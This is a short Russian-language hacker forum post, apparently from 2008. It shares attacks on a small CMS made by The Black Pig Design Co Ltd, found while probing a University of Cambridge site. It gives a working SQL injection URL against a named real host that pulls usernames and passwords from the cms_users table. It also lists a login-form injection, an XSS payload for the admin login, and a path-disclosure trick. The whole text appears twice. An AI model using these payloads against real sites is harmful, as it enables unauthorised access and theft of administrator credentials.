$n@ke
26.12.2008, 22:08
Наткнулса исследуя Университет Кембриджа:
Данная CMS не очень распространена, однако на ней несколько ПИАРистых сайтов работают.
Sql-inj
1. Имя файла может меняться, но уязвим параметр key
http://www.enterprise.cam.ac.uk/archive.php?key=24+UNION+SELECT+username,password+ FROM+cmscamenter.cms_users--
2. Скуля в админке, при авторизации
POST
formloginuser=%00'
XSS
http://www.site.com/cms/admin.php
POST
action=login&gomodule=>"><script%20%0a%0d>alert(KU-KU,7750312847)%3B</Script>
Тоже самое в goid,gopage
Админка:
site.com/cms/
Раскрытие пути
http://www.site.com/cms/admin.php
в поле логина ставим ОДИНАРНУЮ КАВЫЧКУ
Table: cms_users
Fields: username,password
Author: The Black Pig Design Co Ltd
www.blackpig.co.uk
Сорцов нет;аплоад,судя по логам-есть, но я ненашел.
Данная CMS не очень распространена, однако на ней несколько ПИАРистых сайтов работают.
Sql-inj
1. Имя файла может меняться, но уязвим параметр key
http://www.enterprise.cam.ac.uk/archive.php?key=24+UNION+SELECT+username,password+ FROM+cmscamenter.cms_users--
2. Скуля в админке, при авторизации
POST
formloginuser=%00'
XSS
http://www.site.com/cms/admin.php
POST
action=login&gomodule=>"><script%20%0a%0d>alert(KU-KU,7750312847)%3B</Script>
Тоже самое в goid,gopage
Админка:
site.com/cms/
Раскрытие пути
http://www.site.com/cms/admin.php
в поле логина ставим ОДИНАРНУЮ КАВЫЧКУ
Table: cms_users
Fields: username,password
Author: The Black Pig Design Co Ltd
www.blackpig.co.uk
Сорцов нет;аплоад,судя по логам-есть, но я ненашел.